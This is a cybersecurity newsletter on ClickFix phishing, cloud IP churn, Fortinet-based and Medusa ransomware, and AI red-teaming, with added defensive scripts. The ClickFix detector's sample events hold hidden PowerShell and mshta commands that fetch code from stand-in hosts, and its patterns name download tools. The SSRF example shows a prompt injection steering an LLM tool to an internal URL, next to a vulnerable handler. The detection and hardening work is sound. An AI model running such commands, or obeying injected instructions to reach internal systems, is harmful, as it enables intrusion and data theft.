
Cyber Intelligence Weekly (March 16, 2025): Our Take on Three Things You Need to Know

Welcome to our weekly newsletter where we share some of the major developments on the future of cybersecurity that you need to know about. Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!

To receive these and other curated updates to your inbox on a regular basis, please sign up for our email list here: https://echeloncyber.com/ciw-subscribe

Before we get started on this week’s CIW, I’d like to highlight an article we authored on the DeepSeek AI Model.

The Security Paradox – Flaws in DeepSeek Expose Industry-Wide AI Safety Challenges

Cybersecurity experts Emmanuel Petrov and Alex Watts take a deep dive into the risks of DeepSeek R1, uncovering serious security flaws that could put businesses at risk. From open databases to model jailbreaks and data privacy concerns, this AI model presents vulnerabilities that can’t be ignored. Get the full breakdown on what these risks mean and how organizations can stay ahead.

Get the full details here: https://lnkd.in/ejet95pM

Away we go!

1. Cybercriminals Impersonate Booking.com in Phishing Scam Targeting the Hospitality Industry

A new phishing campaign is targeting hotels and hospitality workers by impersonating Booking.com in an attempt to steal credentials and financial data. The scam, which has been active since December 2024, has affected businesses across North America, Europe, and Southeast Asia. Cybercriminals use a social engineering technique called "ClickFix" to trick victims into manually running malicious commands that install credential-stealing malware on their systems. Microsoft researchers identified the attackers as Storm-1865, a cybercriminal group known for financial fraud and phishing operations.

Victims typically receive an email disguised as an important message from Booking.com, referencing issues like negative guest reviews, account verification, or urgent requests from potential customers. Once clicked, the link takes the recipient to a fake CAPTCHA page, where the user is instructed to copy and paste a command that ultimately downloads malware onto their device. The malicious software includes XWorm, Lumma Stealer, VenomRAT, and AsyncRAT, all designed to steal login credentials and financial information.

While Booking.com has confirmed that its own systems were not breached, the company acknowledges that some of its partners and customers have been impacted. Microsoft has urged hospitality workers to be vigilant by verifying sender email addresses, avoiding urgent requests for action, and hovering over links to check their authenticity. As cybercriminals continue to refine their tactics, businesses in the hospitality industry must adopt strong cybersecurity practices to protect their systems and customers from ongoing threats.
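The defender's angle on ClickFix is that the victim, not an exploit, launches the interpreter: the command is pasted into the Run dialog, so the new process hangs off the desktop shell and its command line reaches out to the network. The heuristic below is an added example written for this newsletter item, not Microsoft's detection logic or any vendor's rule. It scores constructed process-creation events (field names modelled loosely on Sysmon Event ID 1 / EDR telemetry; the sample events and the threshold are assumptions) and surfaces the ones that fit that shape.

```python
"""Heuristic for ClickFix-style 'paste this command to verify' lures.

Added example for this newsletter item; not Microsoft's detection logic
or any vendor's rule. Field names, sample events and the alert threshold
are assumptions.
"""
import re
from dataclasses import dataclass

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# explorer.exe is the parent when a command is pasted into the Run dialog.
USER_SHELL_PARENTS = {"explorer.exe"}
NETWORK_CUES = re.compile(
    r"https?://|invoke-webrequest|\biwr\b|\bcurl\b|downloadstring", re.IGNORECASE
)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the list of matched indicators (empty for non-interpreter events)."""
    if basename(ev.image) not in INTERPRETERS:
        return []
    reasons = ["script interpreter"]
    if basename(ev.parent_image) in USER_SHELL_PARENTS:
        reasons.append("launched from the desktop shell (Run dialog)")
    if NETWORK_CUES.search(ev.command_line):
        reasons.append("command line fetches from the network")
    if HIDDEN_WINDOW.search(ev.command_line):
        reasons.append("hidden window requested")
    return reasons


ALERT_THRESHOLD = 3  # interpreter + shell parent + network cue (assumed tuning)


def triage(events):
    """Return (event, reasons) for every event at or above the threshold."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= ALERT_THRESHOLD:
            hits.append((ev, reasons))
    return hits


# Constructed telemetry: a developer doing normal work, a front-desk user
# running a harmless command, and the same user after pasting a lure.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft VS Code\Code.exe",
                 "powershell.exe Get-ChildItem C:\\repo", "CORP\\dev01"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
                 "cmd.exe /c dir", "CORP\\frontdesk"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 "powershell -w hidden -c \"iwr http://verify-captcha.invalid/step2\"",
                 "CORP\\frontdesk"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta https://booking-review.invalid/verify", "CORP\\frontdesk"),
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(ev.user, basename(ev.image), "->", "; ".join(reasons))
```

Run stand-alone, the script reports the two front-desk events that combine an interpreter, an Explorer parent and a network fetch, and stays quiet on the developer's PowerShell session and the plain `dir`. The threshold is deliberately a count of independent cues rather than a string match on one payload, because the pasted command changes from campaign to campaign while the delivery shape does not.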

Cloud “Infrastructure Laundering” Discovered

In early February 2025, cybersecurity researchers uncovered a sophisticated scheme termed "infrastructure laundering," wherein threat actors exploit reputable cloud service providers like Amazon Web Services (AWS) and Microsoft Azure to host malicious activities. This method involves the rapid acquisition and disposal of IP addresses from these platforms, enabling cybercriminals to mask their operations and evade detection.

The Emergence of Infrastructure Laundering

The term "infrastructure laundering" was introduced by researchers at Silent Push, who identified this tactic while investigating the extensive use of AWS and Azure services by threat actors. Their research led them to the Funnull content delivery network (CDN), a China-based entity previously associated with malicious activities. Funnull was found to be renting IP addresses from these cloud providers and mapping them to fraudulent websites. By continuously cycling through cloud resources—acquiring new IPs and discarding them before detection—Funnull effectively obscured its malicious infrastructure within legitimate cloud environments.

Scope of Exploitation

Silent Push's analysis revealed that Funnull had rented over 1,200 IP addresses from AWS and nearly 200 from Microsoft Azure. Although many of these IPs have been decommissioned, Funnull's strategy involves persistently obtaining new addresses every few weeks. This rapid turnover hampers defenders' efforts to identify and block malicious activities promptly. The blending of malicious operations with legitimate web traffic further complicates detection and mitigation, as indiscriminate blocking could disrupt services for genuine users.

Implications for Cloud Security

The exploitation of mainstream cloud services for malicious purposes presents significant challenges for cybersecurity. Cloud providers like AWS and Microsoft Azure are integral to the infrastructure of countless organizations worldwide. Threat actors leveraging these platforms can exploit the inherent trust associated with their IP addresses, making it difficult for security systems to distinguish between legitimate and malicious traffic. This tactic not only undermines the reputation of these cloud services but also poses risks to their clients, who may inadvertently interact with or be targeted by malicious entities operating under the guise of trusted infrastructure.

Challenges in Mitigation

Addressing infrastructure laundering requires a nuanced approach. Cloud service providers must balance the need for stringent security measures with the imperative to maintain seamless service for legitimate users. Implementing overly aggressive blocking or takedown policies could lead to collateral damage, affecting innocent parties who share IP address spaces or rely on the same services. Moreover, the dynamic nature of IP allocation and the sheer scale of cloud infrastructures make real-time monitoring and response a formidable task.

Recommendations for Strengthening Cloud Security

To combat infrastructure laundering and similar threats, a collaborative effort between cloud service providers, security researchers, and end-users is essential. The following measures can enhance the security posture against such exploits:

  1. Enhanced Monitoring and Analytics: Cloud providers should implement advanced monitoring tools capable of detecting anomalous patterns indicative of malicious activities. Machine learning algorithms can analyze traffic behaviors to identify and flag suspicious operations.
  2. Stricter Verification Processes: Implementing rigorous vetting procedures for entities renting IP addresses can help deter malicious actors. This may include thorough background checks and continuous monitoring of clients' activities.
  3. Collaborative Threat Intelligence Sharing: Establishing channels for real-time information exchange between cloud providers, cybersecurity firms, and law enforcement agencies can facilitate swift identification and mitigation of threats.
  4. User Education and Awareness: Organizations utilizing cloud services should be educated about potential risks and best practices for securing their environments. This includes regular training on recognizing and responding to suspicious activities.
  5. Development of Advanced Filtering Techniques: Investing in research to create filtering mechanisms that can accurately distinguish between legitimate and malicious traffic will reduce the risk of collateral damage during mitigation efforts.

The phenomenon of infrastructure laundering exemplifies the evolving tactics of cybercriminals in leveraging trusted platforms to conduct illicit activities. As threat actors continue to adapt, it is imperative for the cybersecurity community to develop innovative strategies and foster collaboration to safeguard the integrity of cloud infrastructures. Proactive measures, informed by ongoing research and shared intelligence, are crucial in staying ahead of such sophisticated threats.
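Recommendation 1 above asks for monitoring that picks out the pattern Silent Push described: a domain that burns through cloud IP addresses every few weeks, each one kept only briefly. The script below is an added example written for this item, not Silent Push's tooling or any provider's code. It profiles constructed passive-DNS-style observations (the records and the thresholds are assumptions) and flags domains whose distinct-IP count is high while the median time an IP stayed mapped is short. The output is a triage signal for analysts, not a blocklist, which is the point made under "Challenges in Mitigation": the same address ranges serve legitimate tenants.

```python
"""Surfacing rapid IP churn in cloud address space from passive-DNS-style data.

Added example for the infrastructure-laundering item; not Silent Push's
tooling or any provider's code. Observation records are constructed and
the thresholds are assumptions to tune against a defender's own baseline.
"""
from collections import defaultdict
from datetime import date, timedelta
from statistics import median


def _churn_records(domain, first_day, count, lifetime_days):
    """Constructed records for a domain rotating through short-lived cloud IPs."""
    rows = []
    for i in range(count):
        first = first_day + timedelta(days=i * lifetime_days)
        last = first + timedelta(days=lifetime_days - 1)
        provider = "aws" if i % 2 == 0 else "azure"
        rows.append((first.isoformat(), last.isoformat(), domain,
                     f"198.51.100.{i + 1}", provider))
    return rows


# (first_seen, last_seen, domain, ip, provider): constructed sample data.
OBSERVATIONS = [
    ("2025-01-01", "2025-03-01", "stable-shop.example", "203.0.113.10", "aws"),
    ("2025-01-01", "2025-03-01", "stable-shop.example", "203.0.113.11", "aws"),
    ("2025-01-01", "2025-03-01", "cdn-site.example", "203.0.113.20", "azure"),
    ("2025-01-15", "2025-03-01", "cdn-site.example", "203.0.113.21", "azure"),
] + _churn_records("fast-rotator.example", date(2025, 1, 1), count=8, lifetime_days=10)


def profile(records):
    """Per domain: distinct IPs, providers used, median days an IP stayed mapped."""
    per_domain = defaultdict(list)
    for first, last, domain, ip, provider in records:
        lifetime = (date.fromisoformat(last) - date.fromisoformat(first)).days + 1
        per_domain[domain].append((ip, provider, lifetime))
    return {
        domain: {
            "distinct_ips": len({ip for ip, _, _ in rows}),
            "providers": sorted({prov for _, prov, _ in rows}),
            "median_lifetime_days": median(life for _, _, life in rows),
        }
        for domain, rows in per_domain.items()
    }


def flag_churners(records, min_ips=5, max_median_lifetime=14):
    """Domains that use many IPs and keep each only briefly: a triage signal."""
    return sorted(
        domain for domain, p in profile(records).items()
        if p["distinct_ips"] >= min_ips
        and p["median_lifetime_days"] <= max_median_lifetime
    )


if __name__ == "__main__":
    for domain in flag_churners(OBSERVATIONS):
        print(domain, profile(OBSERVATIONS)[domain])
```

Only the rotating domain is flagged; the two long-lived sites never cross the churn threshold even though one of them also added an address mid-period. A real deployment would feed this from a passive-DNS or CDN-log source and would enrich each flagged domain (registration age, certificate history, whether the IPs were ever shared with other tenants) before anyone acts on it.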


2. Medusa Ransomware Strikes Over 300 Critical Infrastructure Organizations in the U.S.

A new advisory from the Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with the FBI and MS-ISAC, warns that the Medusa ransomware operation has affected over 300 critical infrastructure organizations across the United States. Since February 2025, industries such as healthcare, education, technology, manufacturing, and legal services have reported being impacted by this growing cyber threat. Authorities emphasize that Medusa’s developers and affiliates have been actively targeting vulnerable systems, demanding large ransoms and threatening data leaks to coerce victims into paying.

The Medusa ransomware group, which first surfaced in 2021, has evolved into a ransomware-as-a-service (RaaS) operation, where cybercriminal affiliates purchase access to deploy attacks on targeted networks. The attackers primarily gain access through initial access brokers, phishing campaigns, and exploitation of unpatched security vulnerabilities. Notably, the Medusa Blog on the dark web serves as a platform where hackers publicly leak stolen data from organizations that refuse to pay ransom demands. Victims of past attacks include Minneapolis Public Schools and Toyota Financial Services, with ransom demands reaching up to $8 million.

Medusa ransomware attacks have increased by 42% year-over-year, with nearly double the attacks observed in early 2025 compared to the same period in 2024. In response, CISA and the FBI recommend immediate security measures, including patching known vulnerabilities, segmenting networks, filtering traffic from untrusted sources, and enforcing multi-factor authentication. As cybercriminals continue refining their tactics, organizations must take proactive cybersecurity measures to defend against the escalating threat of Medusa ransomware.


Red Teaming 100 GenAI Products: Lessons from Microsoft’s AI Red Team

Microsoft’s AI Red Team recently published key findings from red teaming over 100 generative AI (GenAI) products, including applications, features, copilots, plugins, and models, offering critical insights for security practitioners and AI safety leaders. Their comprehensive white paper introduces a novel threat model ontology that combines canonical security frameworks like MITRE ATT&CK with emerging AI-specific attack vectors to provide a cohesive approach to analyzing both security risks and responsible AI gaps.

Main takeaways from the research include:

  • AI systems amplify traditional security risks while introducing new attack vectors. Organizations should maintain robust security hygiene while developing AI-specific security capabilities.
  • Human expertise remains irreplaceable in AI security testing, especially for evaluating complex scenarios involving subject matter expertise, cultural nuances, and psychosocial impacts.
  • Effective AI security requires a defense-in-depth approach combining continuous red teaming, best-practice security controls, and AI-specific safeguards in iterative “break-fix cycles”.

The research underscores a crucial reality: GenAI systems do not just introduce new attack surfaces—they amplify existing security risks. The team’s findings reveal that while prompt injections and model evasion techniques remain prominent exploits, traditional vulnerabilities like Server-Side Request Forgery (SSRF) remain equally compromising to AI systems. The diagram below shows how the well-known SSRF vulnerability can be exploited in a GenAI system. This dual threat landscape requires security teams to evolve their assessment methodologies while maintaining rigorous coverage of fundamental security practices.


Figure 1: Process Flow of SSRF Vulnerability in GenAI Application
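The SSRF path in Figure 1 is the classic one with an LLM in the middle: the application gives the model a "fetch this URL" tool, a prompt injection steers the model into requesting an internal address, and the application's own network position does the rest. The snippet below is an added example for this item, not code from the white paper, from PyRIT or from any product. It shows the vulnerable tool handler beside a hardened one; the resolver, HTTP client and allowlist are stubbed and assumed so that it runs offline.

```python
"""SSRF through an LLM tool call: the vulnerable fetch beside a hardened one.

Added example for the Microsoft AI Red Team item; not code from the white
paper, PyRIT or any product. Model output, DNS resolver and HTTP client are
stubbed so it runs offline; the allowlist and resolver table are assumptions.
"""
import ipaddress
from urllib.parse import urlsplit

# Stand-ins for the real network (constructed).
FAKE_DNS = {"docs.example.com": "93.184.216.34", "intranet.corp.local": "10.0.0.5"}


def fake_resolve(host):
    return FAKE_DNS[host]


def fake_http_get(ip, host, path):
    """Pretend to connect to `ip` and send `Host: host`; return what would be sent."""
    return f"GET {path} -> {ip} (Host: {host})"


# --- Vulnerable: the tool fetches whatever URL appears in the model's output.
# A prompt injection in a retrieved document can steer the model to emit an
# internal name or address, and the app's network position does the rest.
def fetch_url_vulnerable(url):
    p = urlsplit(url)
    host = p.hostname
    ip = FAKE_DNS.get(host, host)  # IP literals pass straight through
    return fake_http_get(ip, host, p.path or "/")


# --- Hardened: scheme and host allowlist, public-address check, IP pinning.
ALLOWED_HOSTS = {"docs.example.com"}  # assumed; the app's real allowlist


class SSRFBlocked(Exception):
    pass


def fetch_url_hardened(url, resolve=fake_resolve, http_get=fake_http_get):
    p = urlsplit(url)
    if p.scheme not in ("http", "https"):
        raise SSRFBlocked(f"scheme {p.scheme!r} not allowed")
    if p.username or p.password:
        raise SSRFBlocked("credentials embedded in URL")
    host = p.hostname
    if not host or host not in ALLOWED_HOSTS:
        raise SSRFBlocked(f"host {host!r} not on the allowlist")
    ip = ipaddress.ip_address(resolve(host))
    # Defence in depth: even an allowlisted name can be pointed at internal space.
    if (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
        raise SSRFBlocked(f"{host} resolved to non-public address {ip}")
    # Connect to the address just checked and send the original Host header, so
    # a second lookup (DNS rebinding) cannot swap in a different target. Any
    # redirect must come back through this function, never be followed blindly.
    return http_get(str(ip), host, p.path or "/")


def is_blocked(url, **kwargs):
    """True when the hardened fetch refuses the URL (demonstration helper)."""
    try:
        fetch_url_hardened(url, **kwargs)
        return False
    except SSRFBlocked:
        return True


def handle_tool_call(call, fetcher):
    """Dispatch a model-proposed tool call shaped like
    {"tool": "fetch_url", "args": {"url": "..."}} (constructed format)."""
    if call.get("tool") != "fetch_url":
        raise ValueError("unknown tool")
    return fetcher(call["args"]["url"])


if __name__ == "__main__":
    # Constructed model output after an injected instruction asked for an internal page.
    injected = {"tool": "fetch_url", "args": {"url": "http://intranet.corp.local/admin"}}
    print("vulnerable handler sends:", handle_tool_call(injected, fetch_url_vulnerable))
    print("hardened handler blocks it:", is_blocked(injected["args"]["url"]))
```

The allowlist is the primary control; the address check and pinning are there because an allowlisted hostname is still an attacker-influenced input the moment its DNS changes, and a client that re-resolves on connect or follows redirects on its own would quietly undo the check.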

Most notably, the research challenges the notion that AI security can be fully automated. Although the Microsoft team leveraged sophisticated automation tools like PyRIT (i.e., their open-source Python Risk Identification Toolkit), they found that human expertise is irreplaceable for evaluating content risks, contextual harms, and human-AI interactions. This human expertise spans subject matter knowledge, cultural competence, and emotional intelligence. Their case studies demonstrate how technical vulnerabilities often intersect with nuanced psychosocial and cultural factors that automated tools currently cannot meaningfully assess.

The team’s findings highlight a defense-in-depth strategy that combines traditional security hardening, AI-specific safeguards, and continuous red teaming that adjusts to novel harms in a “break-fix cycle”, also known as purple-teaming. This research provides both a strategic framework and tactical guidance for securing AI systems, highlighting the importance of cross-functional expertise in robust AI security programs. For detailed case studies and technical recommendations on developing AI security strategies, reference the full report.

3. SuperBlack Ransomware Exploits Fortinet Flaws to Breach Critical Systems

A newly identified ransomware group, operating under the alias Mora_001, has been leveraging vulnerabilities in Fortinet firewalls to infiltrate systems and deploy its custom ransomware strain, SuperBlack. The attackers exploit two authentication bypass vulnerabilities, CVE-2024-55591 and CVE-2025-24472, which were disclosed by Fortinet in early 2025. These security flaws allow unauthorized access to FortiGate firewall appliances, enabling attackers to escalate privileges and establish persistent access for deploying ransomware payloads.

According to researchers, the attack methodology remains consistent across victims. The group first gains super administrator privileges through WebSocket-based exploits or direct HTTPS requests targeting vulnerable firewall interfaces. Once inside, they create unauthorized admin accounts, manipulate automation settings to maintain access, and expand their foothold using VPN credentials, SSH, and the Windows Management Instrumentation command-line utility (WMIC). The attackers then exfiltrate sensitive data before launching the encryption process as part of their double extortion strategy, demanding ransoms in exchange for decryption keys and to prevent data leaks.

Further analysis suggests a possible connection between SuperBlack and the notorious LockBit ransomware operation. Researchers noted similarities in encryption methods, overlapping infrastructure, and ransom note identifiers tied to LockBit affiliates. However, SuperBlack appears to function independently while adopting LockBit’s techniques, making it a significant threat to enterprises relying on Fortinet security appliances.

We strongly advise organizations to immediately patch vulnerable Fortinet devices, restrict public access to firewall management interfaces, and implement multi-factor authentication (MFA) to prevent unauthorized access. Given the rapid escalation of SuperBlack ransomware attacks, cybersecurity teams must actively monitor for indicators of compromise (IoCs) and strengthen their incident response capabilities to mitigate the growing risk.


Thanks for reading!

About us: Echelon is a full-service cybersecurity consultancy that offers holistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about